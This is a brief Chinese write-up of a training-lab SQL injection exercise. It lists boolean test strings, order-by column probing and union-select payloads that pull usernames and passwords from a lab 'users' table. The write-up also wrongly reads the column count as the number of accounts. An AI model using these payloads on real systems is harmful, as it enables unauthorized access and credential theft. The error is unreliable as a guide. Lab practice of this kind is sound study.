合天网安实验室sql注入实验一 WRITE UP

在虚拟机chrome输入靶场网址:

10.1.1.11:81

打开实验一。

 

 

合天网安实验室sql注入实验一 WRITE UP_第1张图片

 

 

合天网安实验室sql注入实验一 WRITE UP_第2张图片 此时用到语句:       name = root' and '1' = '1

 

 

合天网安实验室sql注入实验一 WRITE UP_第3张图片 name = root' and '1' = '2

 

 接下来用order by 语句:

root' order by 4%23
root' order by 5%23
root' order by 6%23

4,5正常,6异常。

即查询出有五个账户。

 

合天网安实验室sql注入实验一 WRITE UP_第4张图片 root' union select 1,2,3,4,5 from users%23 合天网安实验室sql注入实验一 WRITE UP_第5张图片 root' union select 1,name,passwd,4,5 from users%23

 实验一即以上操作。

你可能感兴趣的:(ctf,渗透基础)